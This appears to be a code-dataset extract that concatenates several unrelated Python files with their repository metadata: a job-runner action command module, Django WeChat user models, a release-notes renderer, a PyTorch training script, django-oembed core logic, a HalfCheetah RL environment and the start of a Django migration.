return False
self.start_time = timeutils.current_timestamp()
return self.machine.transition('start')
def exited(self, exit_status):
if not self.machine.check('exit'):
return False
self.end_time = timeutils.current_timestamp()
self.exit_status = exit_status
return self.machine.transition('exit')
def write_stderr(self, value):
self.stderr.write(value)
def write_stdout(self, value):
self.stdout.write(value)
def done(self):
if not self.machine.check('close'):
return False
self.stdout.close()
self.stderr.close()
return self.machine.transition('close')
def handle_errback(self, result):
"""Handle an unexpected error while being run. This will likely be
        an internal error. Clean up the state of this ActionCommand and log
something useful for debugging.
"""
log.error("Unknown failure for ActionCommand run %s: %s\n%s",
self.id, self.command, str(result))
self.exited(result)
self.done()
@property
def is_failed(self):
return bool(self.exit_status)
@property
def is_complete(self):
"""Complete implies done and success."""
return self.machine.state == self.COMPLETE
@property
def is_done(self):
"""Done implies no more work will be done, but might not be success."""
return self.machine.state in (self.COMPLETE, self.FAILSTART)
def __repr__(self):
return "ActionCommand %s %s: %s" % (self.id, self.command, self.state)
class StringBuffer(object):
"""An object which stores strings."""
def __init__(self):
self.buffer = []
def write(self, msg):
self.buffer.append(msg)
def get_value(self):
return ''.join(self.buffer).rstrip()
def close(self):
pass
class StringBufferStore(object):
"""A serializer object which can be passed to ActionCommand as a
serializer, but stores streams in memory.
"""
def __init__(self):
self.buffers = {}
def open(self, name):
return self.buffers.setdefault(name, StringBuffer())
def get_stream(self, name):
return self.buffers[name].get_value()
def clear(self):
self.buffers.clear()
class NoActionRunnerFactory(object):
"""Action runner factory that does not wrap the action run command."""
@classmethod
def create(cls, id, command, serializer):
return ActionCommand(id, command, serializer)
@classmethod
def build_stop_action_command(cls, _id, _command):
"""It is not possible to stop action commands without a runner."""
raise NotImplementedError("An action_runner is required to stop.")
class SubprocessActionRunnerFactory(object):
"""Run actions by wrapping them in `action_runner.py`."""
runner_exec_name = "action_runner.py"
status_exec_name = "action_status.py"
def __init__(self, status_path, exec_path):
self.status_path = status_path
self.exec_path = exec_path
@classmethod
def from_config(cls, config):
return cls(config.remote_status_path, config.remote_exec_path)
def create(self, id, command, serializer):
command = self.build_command(id, command, self.runner_exec_name)
return ActionCommand(id, command, serializer)
def build_command(self, id, command, exec_name):
status_path = os.path.join(self.status_path, id)
runner_path = os.path.join(self.exec_path, exec_name)
return '''%s "%s" "%s"''' % (runner_path, status_path, command)
def build_stop_action_command(self, id, command):
command = self.build_command(id, command, self.status_exec_name)
run_id = '%s.%s' % (id, command)
return ActionCommand(run_id, command, StringBufferStore())
def __eq__(self, other):
return (self.__class__ == other.__class__ and
self.status_path == other.status_path and
self.exec_path == other.exec_path)
def __ne__(self, other):
return not self == other
def create_action_runner_factory_from_config(config):
"""A factory-factory method which returns a callable that can be used to
create ActionCommand objects. The factory definition should match the
constructor for ActionCommand.
"""
if not config:
return NoActionRunnerFactory
if config.runner_type not in schema.ActionRunnerTypes:
raise ValueError("Unknown runner type: %s", config.runner_type)
if config.runner_type == schema.ActionRunnerTypes.none:
return NoActionRunnerFactory
if config.runner_type == schema.ActionRunnerTypes.subprocess:
return SubprocessActionRunnerFactory.from_config(config)
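# Hedged sketch: one way the factory-factory above could be exercised; the
# config object here is a stand-in namedtuple, not the real tron config schema.
#
#   from collections import namedtuple
#   FakeConfig = namedtuple(
#       "FakeConfig", "runner_type remote_status_path remote_exec_path")
#   cfg = FakeConfig(schema.ActionRunnerTypes.subprocess,
#                    "/var/run/tron", "/usr/local/bin")
#   factory = create_action_runner_factory_from_config(cfg)
#   action_cmd = factory.create("job.0.action", "echo hello", StringBufferStore())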
| 30.418182
| 79
| 0.653915
|
440b4c8c70928e461edb9675070009070ace5d6c
| 767
|
py
|
Python
|
emo/wsLogin/models.py
|
EasyMealOrder/backEnd
|
3b7b2def08784a8aae863c941dc3cd0706a85b5d
|
[
"MIT"
] | null | null | null |
emo/wsLogin/models.py
|
EasyMealOrder/backEnd
|
3b7b2def08784a8aae863c941dc3cd0706a85b5d
|
[
"MIT"
] | 4
|
2018-06-20T08:10:35.000Z
|
2018-06-23T05:18:02.000Z
|
emo/wsLogin/models.py
|
EasyMealOrder/backEnd
|
3b7b2def08784a8aae863c941dc3cd0706a85b5d
|
[
"MIT"
] | null | null | null |
from django.db import models
# Create your models here.
class WxUser(models.Model):
id = models.BigAutoField(primary_key=True)
session_id = models.CharField('session_id', max_length=150)
nickname = models.CharField('昵称', max_length=150)
sex = models.IntegerField('性别')
province = models.CharField('省份', max_length=150)
city = models.CharField('城市', max_length=150)
country = models.CharField('城市', max_length=150)
headimgurl = models.CharField('头像', max_length=150)
privilege = models.CharField('特权', max_length=150)
unionid = models.CharField('统一标识', max_length=150)
class WxOpenid(models.Model):
openid = models.CharField('openid', max_length=150)
access_token = models.CharField('access_token', max_length=150)
| 42.611111
| 67
| 0.720991
|
59939695a51a170ffadfe045fb4c65647999db3a
| 12,483
|
py
|
Python
|
github/release_notes/renderer.py
|
zkdev/cc-utils
|
042c6632ca6f61a484bc0a71f85957aeba7f7278
|
[
"BSD-3-Clause"
] | null | null | null |
github/release_notes/renderer.py
|
zkdev/cc-utils
|
042c6632ca6f61a484bc0a71f85957aeba7f7278
|
[
"BSD-3-Clause"
] | null | null | null |
github/release_notes/renderer.py
|
zkdev/cc-utils
|
042c6632ca6f61a484bc0a71f85957aeba7f7278
|
[
"BSD-3-Clause"
] | null | null | null |
# Copyright (c) 2019-2020 SAP SE or an SAP affiliate company. All rights reserved. This file is
# licensed under the Apache Software License, v. 2 except as noted otherwise in the LICENSE file
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from abc import abstractmethod
from collections import namedtuple
from pydash import _
from github.release_notes.model import ReleaseNote, REF_TYPE_COMMIT
def get_or_call(obj, path):
value = _.get(obj, path)
if callable(value):
return value()
return value
TitleNode = namedtuple("TitleNode", ["identifiers", "title", "nodes", "matches_rls_note_field_path"])
TARGET_GROUP_USER_ID = 'user'
TARGET_GROUP_USER = TitleNode(
identifiers=[TARGET_GROUP_USER_ID],
title='USER',
nodes=None,
matches_rls_note_field_path='target_group_id'
)
TARGET_GROUP_OPERATOR_ID = 'operator'
TARGET_GROUP_OPERATOR = TitleNode(
identifiers=[TARGET_GROUP_OPERATOR_ID],
title='OPERATOR',
nodes=None,
matches_rls_note_field_path='target_group_id'
)
TARGET_GROUP_DEVELOPER_ID = 'developer'
TARGET_GROUP_DEVELOPER = TitleNode(
identifiers=[TARGET_GROUP_DEVELOPER_ID],
title='DEVELOPER',
nodes=None,
matches_rls_note_field_path='target_group_id'
)
TARGET_GROUP_DEPENDENCY_ID = 'dependency'
TARGET_GROUP_DEPENDENCY = TitleNode(
identifiers=[TARGET_GROUP_DEPENDENCY_ID],
title='DEPENDENCY',
nodes=None,
matches_rls_note_field_path='target_group_id'
)
TARGET_GROUPS = [
TARGET_GROUP_USER,
TARGET_GROUP_OPERATOR,
TARGET_GROUP_DEVELOPER,
TARGET_GROUP_DEPENDENCY
]
CATEGORY_ACTION_ID = 'action'
CATEGORY_BREAKING_ID = 'breaking'
CATEGORY_BREAKING = TitleNode(
identifiers=[CATEGORY_BREAKING_ID, CATEGORY_ACTION_ID],
title='⚠️ Breaking Changes',
nodes=TARGET_GROUPS,
matches_rls_note_field_path='category_id'
)
CATEGORY_NOTEWORTHY_ID = 'noteworthy'
CATEGORY_NOTEWORTHY = TitleNode(
identifiers=[CATEGORY_NOTEWORTHY_ID],
title='📰 Noteworthy',
nodes=TARGET_GROUPS,
matches_rls_note_field_path='category_id'
)
CATEGORY_IMPROVEMENT_ID = 'improvement'
CATEGORY_OTHER_ID = 'other'
CATEGORY_OTHER = TitleNode(
identifiers=[CATEGORY_OTHER_ID, CATEGORY_IMPROVEMENT_ID],
title='🏃 Others',
nodes=TARGET_GROUPS,
matches_rls_note_field_path='category_id'
)
CATEGORY_FEATURE_ID = 'feature'
CATEGORY_FEATURE = TitleNode(
identifiers=[CATEGORY_FEATURE_ID],
title='✨ New Features',
nodes=TARGET_GROUPS,
matches_rls_note_field_path='category_id'
)
CATEGORY_BUGFIX_ID = 'bugfix'
CATEGORY_BUGFIX = TitleNode(
identifiers=[CATEGORY_BUGFIX_ID],
title='🐛 Bug Fixes',
nodes=TARGET_GROUPS,
matches_rls_note_field_path='category_id'
)
CATEGORY_DOC_ID = 'doc'
CATEGORY_DOC = TitleNode(
identifiers=[CATEGORY_DOC_ID],
title='📖 Documentation',
nodes=TARGET_GROUPS,
matches_rls_note_field_path='category_id'
)
CATEGORIES = [
CATEGORY_BREAKING,
CATEGORY_FEATURE,
CATEGORY_BUGFIX,
CATEGORY_DOC,
CATEGORY_OTHER,
CATEGORY_NOTEWORTHY,
]
class Renderer(object):
def __init__(self, release_note_objs: [ReleaseNote]):
self.rls_note_objs = _.uniq(release_note_objs)
def render(self) -> str:
origin_nodes = _\
.chain(self.rls_note_objs)\
.sort_by(lambda rls_note_obj: rls_note_obj.cn_source_repo.github_repo())\
.sort_by(lambda rls_note_obj: rls_note_obj.is_current_repo, reverse=True)\
.uniq_by(lambda rls_note_obj: rls_note_obj.cn_source_repo.name())\
.map(lambda rls_note_obj: TitleNode(
identifiers=[rls_note_obj.cn_source_repo.name()],
title='[{origin_name}]'.format(
origin_name=rls_note_obj.cn_source_repo.github_repo()
),
nodes=CATEGORIES,
matches_rls_note_field_path='cn_source_repo.name' # path points to a function
))\
.value()
release_note_lines = self._to_release_note_lines(
nodes=origin_nodes,
level=1,
rls_note_objs=self.rls_note_objs
)
if not release_note_lines:
return 'no release notes available'
return '\n'.join(release_note_lines)
def _to_release_note_lines(
self,
nodes: [TitleNode],
level: int,
rls_note_objs: [ReleaseNote]
) -> [str]:
lines = list()
for node in nodes:
filtered_rls_note_objects = _.filter(
rls_note_objs,
lambda rls_note_obj:
get_or_call(rls_note_obj, node.matches_rls_note_field_path) in node.identifiers
)
if not filtered_rls_note_objects:
continue
if node.nodes:
release_note_lines = self._to_release_note_lines(
nodes=node.nodes,
level=level + 1,
rls_note_objs=filtered_rls_note_objects
)
lines.append(self._title(node, level))
lines.extend(release_note_lines)
else:
bullet_points = self._to_bullet_points(
tag=node.title,
rls_note_objs=filtered_rls_note_objects
)
# title is used as bullet point tag -> no need for additional title
lines.extend(bullet_points)
return lines
def _header_suffix(
self,
rls_note_obj: ReleaseNote
) -> str:
if not rls_note_obj.user_login and not rls_note_obj.reference.identifier:
return ''
header_suffix_list = list()
if rls_note_obj.reference.identifier:
header_suffix_list.append(self._header_suffix_reference(rls_note_obj))
if rls_note_obj.user_login:
header_suffix_list.append(self._header_suffix_user(rls_note_obj))
header_suffix = ' ({s})'.format(
s=', '.join(header_suffix_list)
)
return header_suffix
def _header_suffix_reference(
self,
rls_note_obj: ReleaseNote
):
reference_id_text = rls_note_obj.reference.identifier
reference_prefix = rls_note_obj.reference.type.prefix
should_generate_link = self._generate_link(rls_note_obj)
is_reference_auto_linked = rls_note_obj.is_current_repo and not should_generate_link
if rls_note_obj.reference.type == REF_TYPE_COMMIT:
if is_reference_auto_linked:
# for the current repo we use gitHub's feature to auto-link to references,
# hence in case of commits we don't need a prefix
reference_prefix = ''
if should_generate_link:
reference_id_text = rls_note_obj.reference.identifier[0:12] # short commit hash
reference = '{reference_prefix}{ref_id}'.format(
reference_prefix=reference_prefix,
ref_id=reference_id_text,
)
if is_reference_auto_linked:
return reference
if not should_generate_link:
            # returns e.g. gardener/cc-utils#42 or e.g. gardener/cc-utils@commit-hash
return '{repo_path}{reference}'.format(
repo_path=rls_note_obj.cn_source_repo.github_repo_path(),
reference=reference
)
return self._github_reference_link(
rls_note_obj=rls_note_obj,
reference=reference
)
def _header_suffix_user(
self,
rls_note_obj: ReleaseNote
):
is_user_auto_linked = not self._generate_link(rls_note_obj)
if is_user_auto_linked:
return '@{u}'.format(
u=rls_note_obj.user_login
)
return self._github_user_profile_link(
user=rls_note_obj.user_login,
github_url=rls_note_obj.cn_source_repo.github_url()
)
def _github_reference_link(
self,
rls_note_obj: ReleaseNote,
reference: str
) -> str:
reference_link = '{source_repo_url}/{github_api_resource_type}/{ref_id}'.format(
source_repo_url=rls_note_obj.cn_source_repo.github_repo_url(),
ref_id=rls_note_obj.reference.identifier,
github_api_resource_type=rls_note_obj.reference.type.github_api_resource_type
)
link_text = '{repo_path}{reference}'.format(
repo_path=rls_note_obj.cn_source_repo.github_repo_path(),
reference=reference
)
return self._build_link(url=reference_link, text=link_text)
def _github_user_profile_link(
self,
user: str,
github_url: str
) -> str:
user_link_text = '@{u}'.format(u=user)
user_url = '{github_url}/{u}'.format(
u=user,
github_url=github_url
)
return self._build_link(url=user_url, text=user_link_text)
def _to_bullet_points(
self,
tag: str,
rls_note_objs: [ReleaseNote],
):
bullet_points = list()
for rls_note_obj in rls_note_objs:
for i, rls_note_line in enumerate(rls_note_obj.text.splitlines()):
# trim '*' or '-' bullet points
rls_note_line = _\
.chain(rls_note_line)\
.trim()\
.reg_exp_replace(r'^\* ', '')\
.reg_exp_replace(r'^- ', '')\
.trim()\
.value()
if not rls_note_line:
continue
if i == 0:
bullet_points.append(
self._build_bullet_point_head(
line=rls_note_line,
tag=tag,
rls_note_obj=rls_note_obj
)
)
else:
bullet_points.append(self._build_sub_bullet_point(rls_note_line))
return bullet_points
def _build_bullet_point_head(
self,
line: str,
tag: str,
rls_note_obj: ReleaseNote
) -> str:
"""returns the headline of a bullet point, usually containing some meta information
e.g. '* foo-message (#pr-number, @foo-user)' """
pass
def _build_sub_bullet_point(self, rls_note_line: str):
"""returns the details of a bullet point, usually as indented bullet point"""
pass
@abstractmethod
def _title(
self,
node: TitleNode,
level: int
) -> str:
pass
@abstractmethod
def _generate_link(self, rls_note_obj: ReleaseNote) -> bool:
pass
@abstractmethod
def _build_link(self, url: str, text) -> str:
pass
class MarkdownRenderer(Renderer):
def __init__(
self,
release_note_objs: [ReleaseNote],
force_link_generation:bool=False
):
super().__init__(release_note_objs)
self.force_link_generation = force_link_generation
def _title(
self,
node: TitleNode,
level: int
) -> str:
return '{hashtags} {title}'.format(hashtags=_.repeat('#', level),title=node.title)
def _generate_link(self, rls_note_obj: ReleaseNote) -> bool:
return self.force_link_generation or not rls_note_obj.from_same_github_instance
def _build_bullet_point_head(
self,
line: str,
tag: str,
rls_note_obj: ReleaseNote
) -> str:
header_suffix = self._header_suffix(rls_note_obj)
return '* *[{tag}]* {rls_note_line}{header_suffix}'.format(
tag=tag,
rls_note_line=line,
header_suffix=header_suffix
)
def _build_sub_bullet_point(self, rls_note_line: str):
return ' * {rls_note_line}'.format(rls_note_line=rls_note_line)
def _build_link(self, url: str, text) -> str:
return '[{text}]({url})'.format(
url=url,
text=text
)
| 32.339378
| 101
| 0.634543
|
6e6233da3bcc159c130ddf635226a58e88be57fc
| 2,406
|
py
|
Python
|
12/train_scratch.py
|
LCL121/start-leanring-pytorch
|
f077ec892b538f3bff5825acce02872d31a1ab5d
|
[
"MIT"
] | null | null | null |
12/train_scratch.py
|
LCL121/start-leanring-pytorch
|
f077ec892b538f3bff5825acce02872d31a1ab5d
|
[
"MIT"
] | null | null | null |
12/train_scratch.py
|
LCL121/start-leanring-pytorch
|
f077ec892b538f3bff5825acce02872d31a1ab5d
|
[
"MIT"
] | null | null | null |
import torch
from torch import optim, nn
import visdom
import torchvision
from torch.utils.data import DataLoader
from pokemon import Pokemon
from resnet import ResNet18
batchsz = 32
lr = 1e-3
epochs = 10
device = torch.device('cuda')
torch.manual_seed(1234)
train_db = Pokemon('../dataset/pokemon', 224, mode='train')
val_db = Pokemon('../dataset/pokemon', 224, mode='val')
test_db = Pokemon('../dataset/pokemon', 224, mode='test')
train_loader = DataLoader(train_db, batch_size=batchsz, shuffle=True, num_workers=4)
val_loader = DataLoader(val_db, batch_size=batchsz, num_workers=2)
test_loader = DataLoader(test_db, batch_size=batchsz, num_workers=2)
viz = visdom.Visdom()
def evalute(model, loader):
correct = 0
total = len(loader.dataset)
for x, y in loader:
x, y = x.to(device), y.to(device)
with torch.no_grad():
logits = model(x)
pred = logits.argmax(dim=1)
correct += torch.eq(pred, y).sum().float().item()
return correct / total
def main():
model = ResNet18(5).to(device)
optimizer = optim.Adam(model.parameters(), lr=lr)
criteon = nn.CrossEntropyLoss()
best_acc, best_epoch = 0, 0
global_step = 0
viz.line([0], [-1], win='loss', opts=dict(title='loss'))
viz.line([0], [-1], win='val_acc', opts=dict(title='val_acc'))
for epoch in range(epochs):
print('start epoch: {}'.format(epoch))
for step, (x, y) in enumerate(train_loader):
# x: [b, 3, 224, 224], y: [b]
x, y = x.to(device), y.to(device)
logits = model(x)
loss = criteon(logits, y)
optimizer.zero_grad()
loss.backward()
optimizer.step()
viz.line([loss.item()], [global_step], win='loss', update='append')
global_step += 1
if epoch % 1 == 0:
val_acc = evalute(model, val_loader)
if val_acc > best_acc:
best_acc = val_acc
best_epoch = epoch
torch.save(model.state_dict(), 'best.mdl')
viz.line([val_acc], [global_step], win='val_acc', update='append')
print('best acc: ', best_acc, 'best epoch: ', best_epoch)
model.load_state_dict(torch.load('best.mdl'))
print('loaded from ckpt!')
test_acc = evalute(model, test_loader)
print('test acc: ', test_acc)
if __name__ == '__main__':
main()
| 27.033708
| 84
| 0.60931
|
b6c38067a23f078f30133d49f2c5fd5f77846bb8
| 7,357
|
py
|
Python
|
oembed/core.py
|
omni-digital/django-oembed
|
9f1bc1b5130dae8a0dd0aaaabb9602b9f8c2ae56
|
[
"BSD-3-Clause"
] | null | null | null |
oembed/core.py
|
omni-digital/django-oembed
|
9f1bc1b5130dae8a0dd0aaaabb9602b9f8c2ae56
|
[
"BSD-3-Clause"
] | null | null | null |
oembed/core.py
|
omni-digital/django-oembed
|
9f1bc1b5130dae8a0dd0aaaabb9602b9f8c2ae56
|
[
"BSD-3-Clause"
] | null | null | null |
import re
import urllib.request, urllib.error
import gzip
from heapq import heappush, heappop
from io import BytesIO
try:
import simplejson
except ImportError:
from django.utils import simplejson
from django.conf import settings
from django.utils.http import urlencode
from django.utils.safestring import mark_safe
from oembed.models import ProviderRule, StoredOEmbed
from django.template.loader import render_to_string
import logging
logger = logging.getLogger("oembed core")
END_OVERRIDES = (')', ',', '.', '>', ']', ';')
MAX_WIDTH = getattr(settings, "OEMBED_MAX_WIDTH", 320)
MAX_HEIGHT = getattr(settings, "OEMBED_MAX_HEIGHT", 240)
FORMAT = getattr(settings, "OEMBED_FORMAT", "json")
def fetch(url, user_agent="django-oembed/0.1"):
"""
Fetches from a URL, respecting GZip encoding, etc.
"""
request = urllib.request.Request(url)
request.add_header('User-Agent', user_agent)
request.add_header('Accept-Encoding', 'gzip')
opener = urllib.request.build_opener()
f = opener.open(request)
result = f.read()
if f.headers.get('content-encoding', '') == 'gzip':
        result = gzip.GzipFile(fileobj=BytesIO(result)).read()
f.close()
return result
def re_parts(regex_list, text):
"""
An iterator that returns the entire text, but split by which regex it
matched, or none at all. If it did, the first value of the returned tuple
is the index into the regex list, otherwise -1.
>>> first_re = re.compile('asdf')
>>> second_re = re.compile('an')
>>> list(re_parts([first_re, second_re], 'This is an asdf test.'))
[(-1, 'This is '), (1, 'an'), (-1, ' '), (0, 'asdf'), (-1, ' test.')]
>>> list(re_parts([first_re, second_re], 'asdfasdfasdf'))
[(0, 'asdf'), (0, 'asdf'), (0, 'asdf')]
>>> list(re_parts([], 'This is an asdf test.'))
[(-1, 'This is an asdf test.')]
>>> third_re = re.compile('sdf')
>>> list(re_parts([first_re, second_re, third_re], 'This is an asdf test.'))
[(-1, 'This is '), (1, 'an'), (-1, ' '), (0, 'asdf'), (-1, ' test.')]
"""
def match_compare(x, y):
return x.start() - y.start()
prev_end = 0
iter_dict = dict((r, r.finditer(text)) for r in regex_list)
# a heapq containing matches
matches = []
# bootstrap the search with the first hit for each iterator
    for regex, iterator in list(iter_dict.items()):
try:
match = next(iterator)
heappush(matches, (match.start(), match))
except StopIteration:
iter_dict.pop(regex)
# process matches, revisiting each iterator from which a match is used
while matches:
# get the earliest match
start, match = heappop(matches)
end = match.end()
if start > prev_end:
# yield the text from current location to start of match
yield (-1, text[prev_end:start])
# yield the match
yield (regex_list.index(match.re), text[start:end])
# get the next match from the iterator for this match
if match.re in iter_dict:
try:
newmatch = next(iter_dict[match.re])
heappush(matches, (newmatch.start(), newmatch))
except StopIteration:
iter_dict.pop(match.re)
prev_end = end
# yield text from end of last match to end of text
last_bit = text[prev_end:]
if len(last_bit) > 0:
yield (-1, last_bit)
def replace(text, max_width=MAX_WIDTH, max_height=MAX_HEIGHT):
"""
Scans a block of text, replacing anything matched by a ``ProviderRule``
pattern with an OEmbed html snippet, if possible.
Templates should be stored at oembed/{format}.html, so for example:
oembed/video.html
These templates are passed a context variable, ``response``, which is a
dictionary representation of the response.
"""
rules = list(ProviderRule.objects.all())
patterns = [re.compile(r.regex, re.I) for r in rules] # Compiled patterns from the rules
parts = [] # The parts that we will assemble into the final return value.
indices = [] # List of indices of parts that need to be replaced with OEmbed stuff.
indices_rules = [] # List of indices into the rules in order for which index was gotten by.
urls = set() # A set of URLs to try to lookup from the database.
stored = {} # A mapping of URLs to StoredOEmbed objects.
index = 0
# First we pass through the text, populating our data structures.
for i, part in re_parts(patterns, text):
if i == -1:
parts.append(part)
index += 1
else:
to_append = ""
# If the link ends with one of our overrides, build a list
while part[-1] in END_OVERRIDES:
to_append += part[-1]
part = part[:-1]
indices.append(index)
urls.add(part)
indices_rules.append(i)
parts.append(part)
index += 1
if to_append:
parts.append(to_append)
index += 1
# Now we fetch a list of all stored patterns, and put it in a dictionary
# mapping the URL to to the stored model instance.
for stored_embed in StoredOEmbed.objects.filter(match__in=urls, max_width=max_width, max_height = max_height):
stored[stored_embed.match] = stored_embed
# Now we're going to do the actual replacement of URL to embed.
for i, id_to_replace in enumerate(indices):
rule = rules[indices_rules[i]]
part = parts[id_to_replace]
try:
# Try to grab the stored model instance from our dictionary, and
# use the stored HTML fragment as a replacement.
parts[id_to_replace] = stored[part].html
except KeyError:
try:
# Build the URL based on the properties defined in the OEmbed spec.
sep = "?" in rule.endpoint and "&" or "?"
q = urlencode({"url": part,
"maxwidth": max_width,
"maxheight": max_height,
"format": FORMAT})
url = "%s%s%s" % (rule.endpoint, sep, q)
# Fetch the link and parse the JSON.
resp = simplejson.loads(fetch(url))
# Depending on the embed type, grab the associated template and
# pass it the parsed JSON response as context.
replacement = render_to_string('oembed/%s.html' % resp['type'], {'response': resp})
if replacement:
stored_embed = StoredOEmbed.objects.create(
match = part,
max_width = max_width,
max_height = max_height,
html = replacement,
)
stored[stored_embed.match] = stored_embed
parts[id_to_replace] = replacement
else:
raise ValueError
except ValueError:
parts[id_to_replace] = part
except KeyError:
parts[id_to_replace] = part
except urllib.error.HTTPError:
parts[id_to_replace] = part
# Combine the list into one string and return it.
return mark_safe(''.join(parts))
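# Hedged usage sketch (illustrative): replace() is typically applied to
# user-supplied text, e.g. from a template filter; any URL matched by a
# ProviderRule is swapped for its stored or freshly fetched embed HTML.
# The URL below is only an example.
#
#   html = replace("Watch this: http://www.youtube.com/watch?v=dQw4w9WgXcQ",
#                  max_width=640, max_height=480)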
| 40.202186
| 114
| 0.595895
|
e3062b124219c226c8a09040d4ccc3a7260206ff
| 6,142
|
py
|
Python
|
multiworld/envs/mujoco/classic_mujoco/half_cheetah.py
|
corl2019metaworld/metaworld
|
46d54644915a7d80d3f4206e2e5abe1ccbdb5393
|
[
"MIT"
] | 249
|
2018-06-07T19:12:05.000Z
|
2022-03-29T14:40:16.000Z
|
multiworld/envs/mujoco/classic_mujoco/half_cheetah.py
|
corl2019metaworld/metaworld
|
46d54644915a7d80d3f4206e2e5abe1ccbdb5393
|
[
"MIT"
] | 37
|
2018-07-25T07:08:57.000Z
|
2021-03-13T21:13:51.000Z
|
multiworld/envs/mujoco/classic_mujoco/half_cheetah.py
|
corl2019metaworld/metaworld
|
46d54644915a7d80d3f4206e2e5abe1ccbdb5393
|
[
"MIT"
] | 67
|
2018-06-26T21:41:21.000Z
|
2022-01-07T10:16:01.000Z
|
from collections import OrderedDict
import numpy as np
from gym.spaces import Dict, Box
from multiworld.core.multitask_env import MultitaskEnv
from multiworld.core.serializable import Serializable
from multiworld.envs.env_util import get_stat_in_paths, create_stats_ordered_dict, get_asset_full_path
from multiworld.envs.mujoco.mujoco_env import MujocoEnv
class HalfCheetahEnv(MujocoEnv, MultitaskEnv, Serializable):
def __init__(self, action_scale=1, frame_skip=5, reward_type='vel_distance', indicator_threshold=.1, fixed_goal=5, fix_goal=False, max_speed=6):
self.quick_init(locals())
MultitaskEnv.__init__(self)
self.action_scale = action_scale
MujocoEnv.__init__(self, self.model_name, frame_skip=frame_skip)
bounds = self.model.actuator_ctrlrange.copy()
low = bounds[:, 0]
high = bounds[:, 1]
self.action_space = Box(low=low, high=high)
self.reward_type = reward_type
self.indicator_threshold=indicator_threshold
self.fixed_goal = fixed_goal
self.fix_goal = fix_goal
self._state_goal = None
self.goal_space = Box(np.array(-1*max_speed), np.array(max_speed))
obs_size = self._get_env_obs().shape[0]
high = np.inf * np.ones(obs_size)
low = -high
self.obs_space = Box(low, high)
self.achieved_goal_space = Box(self.obs_space.low[8], self.obs_space.high[8])
self.observation_space = Dict([
('observation', self.obs_space),
('desired_goal', self.goal_space),
('achieved_goal', self.achieved_goal_space),
('state_observation', self.obs_space),
('state_desired_goal', self.goal_space),
('state_achieved_goal', self.achieved_goal_space),
])
self.reset()
@property
def model_name(self):
return get_asset_full_path('classic_mujoco/half_cheetah.xml')
def step(self, action):
action = action * self.action_scale
self.do_simulation(action, self.frame_skip)
ob = self._get_obs()
info = self._get_info()
reward = self.compute_reward(action, ob)
done = False
return ob, reward, done, info
def _get_env_obs(self):
return np.concatenate([
self.sim.data.qpos.flat[1:],
self.sim.data.qvel.flat,
])
def _get_obs(self):
state_obs = self._get_env_obs()
achieved_goal = state_obs[8]
return dict(
observation=state_obs,
desired_goal=self._state_goal,
achieved_goal=achieved_goal,
state_observation=state_obs,
state_desired_goal=self._state_goal,
state_achieved_goal=achieved_goal,
)
def _get_info(self, ):
state_obs = self._get_env_obs()
xvel = state_obs[8]
desired_xvel = self._state_goal
xvel_error = np.linalg.norm(xvel - desired_xvel)
info = dict()
info['vel_distance'] = xvel_error
info['vel_difference'] =np.abs(xvel - desired_xvel)
info['vel_success'] = (xvel_error < self.indicator_threshold).astype(float)
return info
def compute_rewards(self, actions, obs):
achieved_goals = obs['achieved_goal']
desired_goals = obs['desired_goal']
distances = np.linalg.norm(achieved_goals - desired_goals, axis=1)
if self.reward_type == 'vel_distance':
r = -distances
elif self.reward_type == 'vel_success':
r = -(distances > self.indicator_threshold).astype(float)
else:
raise NotImplementedError("Invalid/no reward type.")
return r
def reset_model(self):
qpos = self.init_qpos + self.np_random.uniform(low=-.1, high=.1, size=self.model.nq)
qvel = self.init_qvel + self.np_random.randn(self.model.nv) * .1
self.set_state(qpos, qvel)
return self._get_obs()
def viewer_setup(self):
self.viewer.cam.distance = self.model.stat.extent * 0.5
def reset(self):
self.reset_model()
goal = self.sample_goal()
self._state_goal = goal['state_desired_goal']
return self._get_obs()
def get_diagnostics(self, paths, prefix=''):
statistics = OrderedDict()
for stat_name in [
'vel_distance',
'vel_success',
'vel_difference',
]:
stat_name = stat_name
stat = get_stat_in_paths(paths, 'env_infos', stat_name)
statistics.update(create_stats_ordered_dict(
'%s%s' % (prefix, stat_name),
stat,
always_show_all_stats=True,
))
statistics.update(create_stats_ordered_dict(
'Final %s%s' % (prefix, stat_name),
[s[-1] for s in stat],
always_show_all_stats=True,
))
return statistics
"""
Multitask functions
"""
@property
def goal_dim(self) -> int:
return 1
def get_goal(self):
return {
'desired_goal': self._state_goal,
'state_desired_goal': self._state_goal,
}
def sample_goals(self, batch_size):
if self.fix_goal:
goals = np.repeat(
self.fixed_goal.copy()[None],
batch_size,
0
)
else:
goals = np.random.uniform(
self.goal_space.low,
self.goal_space.high,
size=(batch_size, self.goal_space.low.size),
)
return {
'desired_goal': goals,
'state_desired_goal': goals,
}
def set_to_goal(self, goal):
pass
def get_env_state(self):
joint_state = self.sim.get_state()
goal = self._state_goal.copy()
return joint_state, goal
def set_env_state(self, state):
state, goal = state
self.sim.set_state(state)
self.sim.forward()
self._state_goal = goal
if __name__ == "__main__":
    env = HalfCheetahEnv()
env.get_goal()
env.step(np.array(1))
env.reset()
| 34.312849
| 148
| 0.605992
|
3fcec7933fa34b0b794921e08104f125a0a50da4
| 5,589
|
py
|
Python
|
netbox/circuits/migrations/0001_initial_squashed_0010_circuit_status.py
|
xcorp/netbox
|
48b9c9da932dc736710d9c14793067093f8f1bde
|
[
"Apache-2.0"
] | 6
|
2017-12-01T05:13:39.000Z
|
2020-01-23T13:04:43.000Z
|
netbox/circuits/migrations/0001_initial_squashed_0010_circuit_status.py
|
xcorp/netbox
|
48b9c9da932dc736710d9c14793067093f8f1bde
|
[
"Apache-2.0"
] | 8
|
2021-04-16T01:38:00.000Z
|
2022-01-04T21:27:27.000Z
|
netbox/circuits/migrations/0001_initial_squashed_0010_circuit_status.py
|
xcorp/netbox
|
48b9c9da932dc736710d9c14793067093f8f1bde
|
[
"Apache-2.0"
] | 3
|
2017-11-18T01:28:22.000Z
|
2018-05-17T14:04:43.000Z
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.14 on 2018-07-31 02:25
import dcim.fields
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
